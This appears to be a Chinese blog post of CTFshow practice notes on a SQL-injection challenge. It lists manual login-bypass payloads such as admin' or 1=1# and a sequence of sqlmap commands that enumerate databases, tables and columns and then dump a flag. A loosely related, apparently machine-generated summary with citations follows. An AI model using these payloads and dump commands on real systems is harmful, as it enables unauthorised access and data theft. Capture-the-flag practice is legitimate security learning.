ctfShow sql注入笔记

遇到了sql注入的题目,记录一下sqlmap使用过程

一、手工注入测试

1、简单的万能注入先测试一下

用户名:admin') or 1=1# /  admin' and 1=1 # admin' or 1=1 # /  admin' and -1=-1 ....

密码:123'

结果没测出来,也没报错,一点反应都没有

二、sqlmap工具扫描

先用sqlmap跑一下,找出注入点

1、将请求包写入1.txt,然后执行sqlmap -r 1.txt --batch

存在时间注入和联合注入,可以利用一下联合注入,但是目前不知道有哪些库和表,先查一下

2、sqlmap -r 1.txt -dbs --batch,ctftraining这个库看着比较像存着flag的数据库,先查看一下

3、sqlmap -r 1.txt -D ctftraining --tables  --batch ,FLAG_TABLE这个表比较像,还是跟着感觉走,查看一下这个表

4、sqlmap -r 1.txt -D ctftraining -T FLAG_TABLE --columns  --batch 

 5、sqlmap -r 1.txt -D ctftraining -T FLAG_TABLE -C "FLAG_COLUMN" --dump  --batch ,空的,感觉错了,从数据库从头再查

6、重复步骤省略,最后在web2数据库下的flag表中发现flag字段,并且成功找到flag

 就很坑,,,,,

 

 

 

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
根据提供的引用内容,我们可以看出ctfshow sql183可能是一个SQL注入漏洞的例子。在引用中,我们可以看到一个SQL语句的示例,其中用户名(username)和密码(password)是通过变量传入的。在引用中,我们可以看到一个可能的注入例子,其中密码参数包含特殊字符(\),并且用户名参数包含了恶意代码(database())。这会导致最终构成的SQL语句中的密码被修改为'\',并且用户名参数中的恶意代码被注入。在引用中,我们可以看到类似的注入情况,但这次是在NoSQL中使用正则表达式来寻找以"ctfshow{"开头的密码。 根据以上信息,ctfshow sql183可能是演示SQL注入漏洞的一个案例。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CTFshow sql注入 上篇(web221-253)](https://blog.csdn.net/Kracxi/article/details/124094102)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFSHOW SQL注入篇(231-253)](https://blog.csdn.net/miuzzx/article/details/125220318)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值